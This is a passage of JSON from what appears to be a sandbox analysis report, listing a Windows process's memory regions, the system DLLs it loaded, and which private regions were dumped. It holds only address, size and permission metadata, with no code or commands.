8791755128832, "type": "region", "version": 1 }, "end_va": 8791755550719, "entry_point": 8791755128832, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_271", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791755128832, "timestamp": "00:00:36.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791784161280, "type": "region", "version": 1 }, "end_va": 8791784812543, "entry_point": 8791784161280, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_272", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791784161280, "timestamp": "00:00:36.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791786061824, "type": "region", "version": 1 }, "end_va": 8791786119167, "entry_point": 8791786061824, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_273", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791786061824, "timestamp": "00:00:36.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791786651648, "type": "region", "version": 1 }, "end_va": 8791787474943, "entry_point": 8791786651648, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_274", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791786651648, "timestamp": "00:00:36.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000275-addr_0x0000000000190000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_275", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:36.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000276-addr_0x00000000002c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_276", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:36.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5996543, "entry_point": 0, "filename": null, "id": "region_277", "name": "pagefile_0x0000000000430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4390912, "timestamp": "00:00:36.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791775248384, "type": "region", "version": 1 }, "end_va": 8791775436799, "entry_point": 8791775248384, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_278", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791775248384, "timestamp": "00:00:36.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777935360, "type": "region", "version": 1 }, "end_va": 8791779020799, "entry_point": 8791777935360, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_279", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777935360, "timestamp": "00:00:36.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_280", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:36.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_281", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:36.796", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000282-addr_0x00000000000d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_282", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:36.797", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000283-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_283", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:36.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 7606271, "entry_point": 0, "filename": null, "id": "region_284", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:00:36.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 28639231, "entry_point": 0, "filename": null, "id": "region_285", "name": "pagefile_0x0000000000750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7667712, "timestamp": "00:00:36.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 32059391, "entry_point": 0, "filename": null, "id": "region_286", "name": "pagefile_0x0000000001b50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28639232, "timestamp": "00:00:36.797", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000287-addr_0x0000000001f70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_287", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:00:36.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2002022399, "entry_point": 2001993728, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_288", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:00:36.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791576870912, "type": "region", "version": 1 }, "end_va": 8791585882111, "entry_point": 8791576870912, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_289", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791576870912, "timestamp": "00:00:36.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791641292800, "type": "region", "version": 1 }, "end_va": 8791641534463, "entry_point": 8791641292800, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_290", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791641292800, "timestamp": "00:00:36.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791735730176, "type": "region", "version": 1 }, "end_va": 8791735779327, "entry_point": 8791735730176, "filename": "\\Windows\\System32\\version.dll", "id": "region_291", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791735730176, "timestamp": "00:00:36.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751327744, "type": "region", "version": 1 }, "end_va": 8791751389183, "entry_point": 8791751327744, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_292", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791751327744, "timestamp": "00:00:36.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791752048640, "type": "region", "version": 1 }, "end_va": 8791753519103, "entry_point": 8791752048640, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_293", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791752048640, "timestamp": "00:00:36.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791773085696, "type": "region", "version": 1 }, "end_va": 8791775195135, "entry_point": 8791773085696, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_294", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791773085696, "timestamp": "00:00:36.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791775444992, "type": "region", "version": 1 }, "end_va": 8791777906687, "entry_point": 8791775444992, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_295", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791775444992, "timestamp": "00:00:37.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791779930111, "entry_point": 8791779049472, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_296", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:00:37.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791780425728, "type": "region", "version": 1 }, "end_va": 8791781322751, "entry_point": 8791780425728, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_297", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791780425728, "timestamp": "00:00:37.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791781343232, "type": "region", "version": 1 }, "end_va": 8791782883327, "entry_point": 8791781343232, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_298", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791781343232, "timestamp": "00:00:37.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791782916096, "type": "region", "version": 1 }, "end_va": 8791784148991, "entry_point": 8791782916096, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_299", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791782916096, "timestamp": "00:00:37.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791784816640, "type": "region", "version": 1 }, "end_va": 8791786037247, "entry_point": 8791784816640, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_300", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791784816640, "timestamp": "00:00:37.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787503616, "type": "region", "version": 1 }, "end_va": 8791787630591, "entry_point": 8791787503616, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_301", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787503616, "timestamp": "00:00:37.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791787634688, "type": "region", "version": 1 }, "end_va": 8791788097535, "entry_point": 8791787634688, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_302", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791787634688, "timestamp": "00:00:37.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791749558272, "type": "region", "version": 1 }, "end_va": 8791749619711, "entry_point": 8791749558272, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_303", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791749558272, "timestamp": "00:00:37.350", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000304-addr_0x0000000002050000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 34406399, "entry_point": 0, "filename": null, "id": "region_304", "name": "private_0x0000000002050000", "norm_filename": null, "region_type": "private_memory", "start_va": 33882112, "timestamp": "00:00:37.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791719018496, "type": "region", "version": 1 }, "end_va": 8791719202815, "entry_point": 8791719018496, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_305", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791719018496, "timestamp": "00:00:37.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791780032512, "type": "region", "version": 1 }, "end_va": 8791780368383, "entry_point": 8791780032512, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_306", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791780032512, "timestamp": "00:00:37.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000307-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_307", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:00:37.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_308", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:00:37.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791726882816, "type": "region", "version": 1 }, "end_va": 8791727235071, "entry_point": 8791726882816, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_309", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791726882816, "timestamp": "00:00:37.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000310-addr_0x0000000002140000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_310", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:00:37.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 36302847, "entry_point": 0, "filename": null, "id": "region_311", "name": "pagefile_0x00000000021c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35389440, "timestamp": "00:00:37.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791722491904, "type": "region", "version": 1 }, "end_va": 8791722590207, "entry_point": 8791722491904, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_312", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791722491904, "timestamp": "00:00:37.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_313", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 39251967, "entry_point": 36306944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_314", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36306944, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791771774976, "type": "region", "version": 1 }, "end_va": 8791772401663, "entry_point": 8791771774976, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_315", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791771774976, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_316", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:00:37.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2826239, "entry_point": 0, "filename": null, "id": "region_317", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:00:37.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791728848896, "type": "region", "version": 1 }, "end_va": 8791730896895, "entry_point": 8791728848896, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_318", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791728848896, "timestamp": "00:00:37.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_319", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:37.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791749361664, "type": "region", "version": 1 }, "end_va": 8791749513215, "entry_point": 8791749361664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_320", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791749361664, "timestamp": "00:00:37.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_321", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:37.576", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000322-addr_0x00000000002e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_322", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:37.577", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000323-addr_0x0000000002590000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39911423, "entry_point": 0, "filename": null, "id": "region_323", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:37.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791624712192, "type": "region", "version": 1 }, "end_va": 8791624769535, "entry_point": 8791624712192, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_324", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791624712192, "timestamp": "00:00:37.578", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000325-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_325", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:00:37.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3280895, "entry_point": 3276800, "filename": "\\Windows\\System32\\en-US\\msctf.dll.mui", "id": "region_326", "name": "msctf.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\msctf.dll.mui", "region_type": "memory_mapped_file", "start_va": 3276800, "timestamp": "00:00:37.648", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000327-addr_0x0000000002610000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39911424, "type": "region", "version": 1 }, "end_va": 40959999, "entry_point": 0, "filename": null, "id": "region_327", "name": "private_0x0000000002610000", "norm_filename": null, "region_type": "private_memory", "start_va": 39911424, 